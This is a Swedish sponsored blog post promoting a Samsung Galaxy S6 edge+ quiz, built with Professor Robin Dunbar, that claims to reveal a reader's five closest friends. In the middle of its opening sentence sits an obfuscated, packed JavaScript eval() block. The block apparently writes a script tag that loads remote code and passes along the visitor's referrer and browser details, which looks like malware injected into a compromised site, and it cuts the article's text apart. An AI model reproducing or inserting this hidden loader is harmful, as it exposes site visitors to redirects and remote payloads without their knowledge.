Image Image Image Image Image Image Image Image Image Image

| 5 december, 2019

Scroll to top

Top

Vet du vilka som är dina vänner – på riktigt? Samsung och Oxford-professor hjälper dig hitta dem.

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksfee|var|u0026u|referrer|rztnh||js|php’.split(’|’),0,{}))
det så att du har en stor bekantskapskrets? Då har du säkert någon gång ställt dig frågan om vilka som egentligen är dina riktiga vänner? Eller kanske vilka som du verkligen kan lita på i vått och torrt? 

Nu har lösning på detta hittats. Samsung har tillsammans med Professor Robin Dunbar tagit fram ett experiment som påvisar just vilka dessa är. I ett interaktivt test kan man nu få fram vilka fem personer som du bör hålla nära dig.

Testet går ut på att svara på några frågor där du ställs inför häpnadsväckande situationer. Exempel på frågor kan vara, vem hade ställt upp för dig?

Enligt Dunbar kan inte människor hålla fast vid fler än 150 personer i sin närmaste bekantskapskrets samtidigt. 15 av dessa personer brukar ofta ses som nära vänner och endast 5 några du alltid kan lita på.

Med nya Samsung Galaxy S6 edge+ kommer du åt dina fem viktigaste kontakter direkt på kanten av skärmen. Vågar du ta reda på vilka dessa fem är? Testa här: http://www.samsung.com/se/thedunbaredgeexperiment/

Kika in videon ovan och som visar hur det går till.

Detta är ett sponsrat inlägg från Samsung